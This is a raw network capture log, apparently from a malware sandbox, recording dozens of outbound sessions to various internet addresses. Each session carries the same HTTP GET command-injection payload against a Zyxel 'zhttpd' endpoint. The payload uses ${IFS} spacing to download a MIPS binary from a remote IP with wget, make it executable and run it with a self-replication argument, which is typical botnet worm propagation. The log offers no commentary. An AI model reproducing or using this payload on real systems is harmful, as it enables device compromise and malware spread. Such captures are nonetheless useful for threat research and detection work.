                                      Jan 14, 2024 15:51:00.633016109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7903192.168.2.1442724167.114.106.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633085012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7904192.168.2.14403624.204.155.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633099079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7905192.168.2.1440012144.128.230.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633116007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7906192.168.2.145074493.94.199.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633173943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7907192.168.2.143550657.222.198.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633214951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7908192.168.2.144321234.212.187.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633275032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7909192.168.2.1451100112.97.99.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633326054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7910192.168.2.1439460143.176.203.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633352041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7911192.168.2.1450740217.223.53.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633377075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7912192.168.2.145074038.203.8.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633423090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7913192.168.2.144199698.172.215.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633465052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7914192.168.2.144072090.102.193.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633517027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7915192.168.2.144446049.103.9.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633552074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7916192.168.2.143853850.59.2.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633605003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7917192.168.2.1460996203.198.155.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633645058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7918192.168.2.1453152130.194.90.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633698940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7919192.168.2.1439462197.86.57.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633723974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7920192.168.2.1439106159.165.120.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633753061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7921192.168.2.143718876.237.55.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633824110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7922192.168.2.1452186174.99.214.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633846998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7923192.168.2.146050434.217.37.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633903980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7924192.168.2.1454340139.184.156.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633945942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7925192.168.2.1446138140.193.168.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.633997917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7926192.168.2.143771664.183.16.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634028912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7927192.168.2.1444758142.238.244.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634088039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7928192.168.2.144934069.119.205.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634114027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7929192.168.2.145079214.180.78.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634152889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7930192.168.2.1460094129.138.48.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634200096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7931192.168.2.1441174120.237.10.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634239912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7932192.168.2.143631846.131.27.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634293079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7933192.168.2.1441636193.126.113.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634316921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7934192.168.2.1445044169.4.253.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634372950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7935192.168.2.1459772222.89.22.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634401083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7936192.168.2.1437030202.4.157.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634454966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7937192.168.2.143465864.29.209.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634493113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7938192.168.2.1442804188.93.6.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634543896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7939192.168.2.144832882.230.126.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634572029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7940192.168.2.1447202223.199.184.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634603977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7941192.168.2.1438960101.252.250.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634661913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7942192.168.2.1443452184.26.179.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634699106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7943192.168.2.1440660144.103.104.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634747982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7944192.168.2.145648476.34.113.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634773970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7945192.168.2.1456034143.53.220.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634824038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7946192.168.2.1458676174.137.94.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634875059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7947192.168.2.144587061.158.127.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634917974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7948192.168.2.1460986141.167.219.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634948015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7949192.168.2.1457308142.79.0.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634967089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7950192.168.2.1433778165.170.64.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.634994030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7951192.168.2.1447486155.232.91.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635051966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7952192.168.2.1455804130.207.178.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635096073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7953192.168.2.1442664182.70.101.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635128975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7954192.168.2.1451426148.116.11.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635174036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7955192.168.2.144345484.160.235.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635224104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7956192.168.2.145220844.179.154.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635251999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7957192.168.2.144900094.129.43.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635305882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7958192.168.2.145892034.70.71.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635325909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7959192.168.2.1448910205.115.174.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635397911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7960192.168.2.146064890.67.214.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635433912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7961192.168.2.14464982.140.60.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635469913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7962192.168.2.1452024202.10.246.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635513067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7963192.168.2.1459192202.89.254.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635550022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7964192.168.2.14583062.3.192.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.635569096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7965192.168.2.145438631.152.127.111443
                                      TimestampBytes transferredDirectionData
